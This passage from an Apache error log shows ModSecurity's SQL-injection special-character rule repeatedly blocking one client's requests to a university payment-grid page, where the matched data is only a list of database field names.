[Tue Aug 29 09:19:31.257084 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1Vs8Co-f0AAPbOKXIAAAAG"]
[Tue Aug 29 09:19:32.061592 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VtMCo-f0AAPbOKXMAAAAG"]
[Tue Aug 29 09:19:32.486173 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VtMCo-f0AAPbOKXQAAAAG"]
[Tue Aug 29 09:19:33.039337 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VtcCo-f0AAPbOKXUAAAAG"]
[Tue Aug 29 09:19:33.215373 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VtcCo-f0AAPbOKXYAAAAG"]
[Tue Aug 29 09:19:36.804576 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VuMCo-f0AAPbOKXcAAAAG"]
[Tue Aug 29 09:19:37.703804 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VucCo-f0AAPbOKXgAAAAG"]
[Tue Aug 29 09:19:38.192904 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VusCo-f0AAPbOKXkAAAAG"]
[Tue Aug 29 09:19:38.365307 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VusCo-f0AAPbOKXoAAAAG"]
[Tue Aug 29 09:19:38.535584 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VusCo-f0AAPbOKXsAAAAG"]
[Tue Aug 29 09:19:38.696012 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VusCo-f0AAPbOKXwAAAAG"]
[Tue Aug 29 09:19:38.831701 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VusCo-f0AAPbOKX0AAAAG"]
[Tue Aug 29 09:19:42.357052 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VvsCo-f0AAPbOKYAAAAAG"]
[Tue Aug 29 09:19:42.535193 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VvsCo-f0AAPbOKYEAAAAG"]
[Tue Aug 29 09:19:42.712870 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VvsCo-f0AAPbOKYIAAAAG"]
[Tue Aug 29 09:19:45.296420 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VwcCo-f0AAPbOKYQAAAAG"]
[Tue Aug 29 09:19:45.463672 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VwcCo-f0AAPbOKYUAAAAG"]
[Tue Aug 29 09:19:45.824223 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VwcCo-f0AAPbOKYYAAAAG"]
[Tue Aug 29 09:19:45.983331 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VwcCo-f0AAPbOKYcAAAAG"]
[Tue Aug 29 09:19:46.153832 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: 